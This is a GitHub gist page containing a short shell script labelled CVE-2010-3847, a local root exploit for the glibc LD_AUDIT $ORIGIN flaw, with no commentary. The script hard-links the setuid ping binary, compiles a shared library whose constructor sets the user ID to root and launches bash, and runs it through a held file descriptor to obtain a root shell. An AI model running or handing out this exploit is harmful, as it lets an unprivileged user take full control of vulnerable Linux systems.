Skip to content

Instantly share code, notes, and snippets.

@hamano
Created October 21, 2010 13:19
Show Gist options
  • Save hamano/638467 to your computer and use it in GitHub Desktop.
Save hamano/638467 to your computer and use it in GitHub Desktop.
CVE-2010-3847
#!/bin/sh
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 999< /tmp/exploit/target
rm -rf /tmp/exploit/
echo 'void __attribute__((constructor)) init(){setuid(0);system("/bin/bash");}' | gcc -w -fPIC -shared -o /tmp/exploit -xc -
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/999
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment